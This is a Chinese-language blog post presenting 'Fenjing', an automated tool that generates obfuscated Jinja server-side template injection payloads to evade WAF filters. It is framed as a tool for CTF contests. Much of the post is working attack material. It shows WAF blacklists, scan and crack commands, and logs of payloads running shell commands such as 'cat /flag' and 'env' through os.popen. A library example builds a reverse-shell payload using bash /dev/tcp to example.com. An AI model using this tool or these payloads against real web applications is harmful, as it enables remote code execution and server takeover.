免责声明

本文仅限于技术研究与讨论,工具仅为CTF赛事开发,严禁用于非法用途,否则产生的一切后果自行承担。

本作品采用知识共享 署名-相同方式共享 4.0 国际 许可协议进行许可,转载请注明原作者为Marven11。

前言

之前有一段时间在研究SSTI, 将CTF中常见的Jinja SSTI WAF绕过技巧整合成了一个工具,基本做到了常规SSTI通杀。

最近主要功能开发基本完毕,Github也破了50星,就简单发一篇文章讲讲这个工具。

介绍

焚靖是一个针对CTF赛事中常规Jinja SSTI题目开发的WAF检测与绕过工具。

焚靖融合了CTF赛事中常见的SSTI绕过技巧,可以灵活组合使用各类绕过技巧全自动构建payload绕过WAF.

其支持自动扫描目标网站中的form元素进行攻击,也支持手动指定payload提交方式让其自动分析并产生payload.

它还支持在攻击成功后直接返回一个模拟终端方便选手执行任意Linux Shell指令。也可以在攻击成功后生成并返回对应的payload

焚靖既可以作为命令行程序使用,也可以作为python库导入到脚本中,其还提供一个网页UI方便不熟悉命令行的选手使用。

实战

<ez_ze></ez_ze>

此题的waf正则如下:

pattern = r"(\{\{|\}\}|popen|os|subprocess|application|getitem|flag\.txt|\.|_|\[|\]|\"|class|subclasses|mro|\\)"

使用命令行python -m fenjing scan --url http://nodex.anna.nssctf.cn:xxxxx/进行攻击,攻击成功后直接返回了一个模拟终端,可以执行任意Linux Shell命令:

$>> cat /flag
INFO:[payload_gen] | Great, string("__import__('os').popen('cat /flag')") can be (('%c'*35)%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,47,102,108,97,103,39,41))
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('cat /flag')")
INFO:[payload_gen] | Great, we generate os_popen_obj('cat /flag')
INFO:[payload_gen] | Great, we generate os_popen_read('cat /flag')

SSTI - Lab

直接上Level 13,黑名单如下:bl['_', '.', '\\', '\'', '"', 'request', '+', 'class', 'init', 'arg', 'config', 'app', 'self', '[', ']']

执行python -m fenjing scan --url http://nodex.anna.nssctf.cn:xxxxx/level/13,当然也是成功的。

$>> env
INFO:[payload_gen] | Great, string("__import__('os').popen('env')") can be ((((lipsum()|urlencode|first)~(dict(c=x)|join))*29)%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,101,110,118,39,41))
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('env')")
INFO:[payload_gen] | Great, we generate os_popen_obj('env')
INFO:[payload_gen] | Great, we generate os_popen_read('env')

也测试了Level 9, 其waf了阿拉伯数字, 当然也是成功的。

$>> env
INFO:[payload_gen] | Great, integer(29) can be (zb+e)
INFO:[payload_gen] | Great, integer(118) can be (llla+t)
INFO:[payload_gen] | Great, string("__import__('os').popen('env')") can be (('%c'*(zb+e))%((qo+e+la+la),(qo+e+la+la),(qo+lla+e+la),(qo+lla+t+la),(llla+la),(llla),(llla+e),(llla+e+la+la),(qo+e+la+la),(qo+e+la+la),(zb+lla+e),(zb+lla+la+la),(llla),(llla+e+la),(zb+lla+la+la),(zb+lla+e+la),(ab),(llla+la),(llla),(llla+la),(qo+lla),(qo+lla+t+la+la),(zb+lla+e),(zb+lla+la+la),(qo+lla),(qo+lla+t+la+la),(llla+t),(zb+lla+la+la),(zb+lla+e+la)))
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('env')")
INFO:[payload_gen] | Great, we generate os_popen_obj('env')
INFO:[payload_gen] | Great, we generate os_popen_read('env')

CTFShow WEB入门 SSTI

直接上最难的web372,这题的正则长这样:re.search(r"\'|\"|args|\[|\_|os|\{\{|request|[0-9]|print|count",name,re.I)

这题需要手动指定提交方式,使用crack功能:python -m fenjing crack --url http://8470780a-69f8-4098-8a89-250eaead1a95.challenge.ctf.show/ --method GET --inputs name

成功是成功了,但是这一题没有回显,就敲了一个sleep 5

$>> sleep 5
INFO:[payload_gen] | Great, integer(33) can be (lla+lla+lla)
INFO:[payload_gen] | Great, integer(53) can be (lla+lla+lla+lla+bb+la+la+la)
INFO:[payload_gen] | Great, string("__import__('os').popen('sleep 5')") can be ((((lipsum()|urlencode|first)+(dict(c=x)|join))*(lla+lla+lla))%((sbb+lla+lla+lla+bb),(sbb+lla+lla+lla+bb),(sbb+lla+lla+lla+lla+la+la+la+la+la),(sbb+lla+lla+lla+lla+bb+la+la+la),(llla+la),(llla),(llla+la+la+la),(llla+la+la+la+la+la),(sbb+lla+lla+lla+bb),(sbb+lla+lla+lla+bb),(lla+lla+lla+bb+la),(lla+lla+lla+bb),(llla),(llla+la+la+la+la),(lla+lla+lla+bb),(lla+lla+lla+bb+la+la),(lla+lla+lla+lla+la+la),(llla+la),(llla),(llla+la),(sbb+lla+lla+lla+lla+la),(sbb+lla+lla+lla+lla+bb+la+la+la+la),(lla+lla+lla+bb+la),(lla+lla+lla+bb),(llla+la+la+la+la),(sbb+lla+lla+lla+lla+bb+la+la),(sbb+lla+lla+lla+lla+la),(sbb+lla+lla+lla+lla+la),(llla+la),(lla+lla+bb+la+la+la+la),(lla+lla+lla+lla+bb+la+la+la),(lla+lla+lla+bb),(lla+lla+lla+bb+la+la)))
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('sleep 5')")
INFO:[payload_gen] | Great, we generate os_popen_obj('sleep 5')
INFO:[payload_gen] | Great, we generate os_popen_read('sleep 5')

反弹shell也是可以的,这里就不放出来了

也测试了比较难的web369,这题是可以回显的

$>> cat /flag
INFO:[payload_gen] | Great, string("__import__('os').popen('cat /flag')") can be ((((lipsum()|urlencode|first)+(dict(c=x)|join))*35)%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,47,102,108,97,103,39,41))
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('cat /flag')")
INFO:[payload_gen] | Great, we generate os_popen_obj('cat /flag')
INFO:[payload_gen] | Great, we generate os_popen_read('cat /flag')

用户反馈的waf

所有黑名单如下:

blacklist = ['_', "'", '"', '.', 'system', 'os', 'eval', 'exec', 'popen', 'subprocess',
'posix', 'builtins', 'namespace','open', 'read', '\\', 'self', 'mro', 'base',
'global', 'init', '/','00', 'chr', 'value', 'get', "url", 'pop', 'import',
'include','request', '{{', '}}', '"', 'config','=']

在改进后也实现了全自动绕过

$>> cat app.py
INFO:[payload_gen] | Great, string("__import__('os').popen('cat app.py')") can be (((((lipsum,)|map(((lipsum|string|list|batch(3)|first|last)~(lipsum|string|list|batch(15)|first|last)~(lipsum|string|list|batch(20)|first|last)~(x|pprint|list|batch(4)|first|last)~(x|pprint|list|batch(2)|first|last)~(lipsum|string|list|batch(5)|first|last)~(lipsum|string|list|batch(8)|first|last)~(x|pprint|list|batch(3)|first|last)~(x|pprint|list|batch(4)|first|last)))|list|first|first)+(lipsum|escape|batch(8)|first|last))*36)%(95,95,105,109,112,111,114,116,95,95,40,39,111,115,39,41,46,112,111,112,101,110,40,39,99,97,116,32,97,112,112,46,112,121,39,41))
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('cat app.py')")
INFO:[payload_gen] | Great, we generate os_popen_obj('cat app.py')
INFO:[payload_gen] | Great, we generate os_popen_read('cat app.py')

安装

支持使用以下方法安装:

使用pip安装运行

pip install fenjing
python -m fenjing webui

下载并运行docker镜像

docker pull marven11/fenjing
docker run --net host -it marven11/fenjing webui

使用

启动网页UI, 只需要python -m fenjing webui然后访问http://127.0.0.1:11451即可

如果网站的HTML中含有可以攻击的表单元素,直接使用python -m fenjing scan --url 'http://xxx/'攻击即可

如果没有则可以手动指定提交方式(GET/POST)与字段名:python -m fenjing crack --url 'http://xxx/' --method GET --inputs name

也可以作为库导入后手动为其提供WAF函数,让其自动分析,解决无法通过常规方式提交payload的题目:

from fenjing import exec_cmd_payload, config_payload
import logging
logging.basicConfig(level = logging.INFO)

def waf(s: str):
    blacklist = [
        "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum",
        "[", '"', "'", "_", ".", "+", "~", "{{",
        "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
        "0","1","2","3","4","5","6","7","8","9"
    ]
    return all(word in s for word in blacklist)

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"")

    print(f"{shell_payload=}")

所有使用方式详见项目Github主页

情景

焚靖针对这一类常规的SSTI题目设计:对用户提供的payload进行正则匹配(或字符串匹配),匹配到危险内容则返回特定的页面,没有匹配到危险内容则将payload拼接到模板中渲染。

因为我们可以很轻松地在payload中构建多条表达式/语句,不难想到我们可以通过类似自动构建语法树的方式全自动地生成payload.

而且因为WAF函数仅仅是一个正则表达式匹配,我们可以确认其拥有幂等性等性质,这大大简化了绕过WAF的工作。

支持项目

焚靖是根据上方提到的情景设计的,如果发现了其应该解出但无法解出的题目,欢迎到Github Issues提交反馈。

点击收藏 | 0 关注 | 1 打赏
  • 动动手指,沙发就是你的了!
登录 后跟帖